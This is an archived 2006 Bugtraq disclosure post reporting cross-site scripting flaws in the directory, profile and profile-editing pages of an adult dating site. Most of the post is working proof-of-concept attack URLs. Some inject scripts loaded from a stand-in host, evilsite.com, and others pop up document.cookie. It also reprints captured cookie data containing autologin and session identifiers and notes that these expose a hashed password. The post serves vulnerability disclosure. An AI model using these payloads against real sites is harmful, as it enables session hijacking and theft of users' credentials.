lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20060610090023.13758.qmail@securityfocus.com>
Date: 10 Jun 2006 09:00:23 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: AsianXO.com - XSS with cookie data include


AsianXO.com

Homepage:
http://www.asianxo.com/

Effected files:
directory.php
profiles.php
Input boxes of editing profile

----------------------------

XSS Vulnerability via dir_id:

Directory.php PoC:
http://www.axo2.com/directory.php?dir_id=1"><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT><"

Profiles.php PoC using  malformed img tags in front a openended iframe:
http://www.axo2.com/profiles.php?userid=999999999<""><iframe%20src=http://evilsite.com/scriptlet.html%20<

------------------------------

Another XSS example of profiles.php, this time using allowed html tags <br> inaurl injection along with <script> tags, 

which also reveals some interesting data:

http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><BR><SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>

The output text:

This is remote text via xss.js located at evilsite.com phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%2291da4589b012c2fe1ceac1fb2363dbc6%22%3Bs%3A6%3A%22userid%22%3Bs%3A5%3A%2210610%22%3B%7D; phpbb2mysql_sid=362562eaac0fc1d69e574584d4f95e60','gallery','height=500,width=700,status=0');"> 

When converting the whole string from hex value, we notice a autologinid:# along with our cookie data that has our md5'ed hash pw in it.

a:2:{s:11:"autologinid";s:32:"91da4589b012c2fe1ceac1fb2363dbc6";s:6:"userid";s:5:"10610";};

NOTE: You can also use <script>alert(document.cookie)</script> and it will create a popup box with the cookie data in it.

PoC:
http://www.axo2.com/profiles.php?userid=99999999<""><BR><BR><BR><BR><BR><script>alert(document.cookie)</script>

---------------------

XSS Vulnerability of input boxes when editing profile:

The location input box doesn't correctly filter all data, for a XSS example we can enter in double < with ' and no 

closing >

<'<IMG SRC=javascript:alert(&quot;XSS&quot;)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ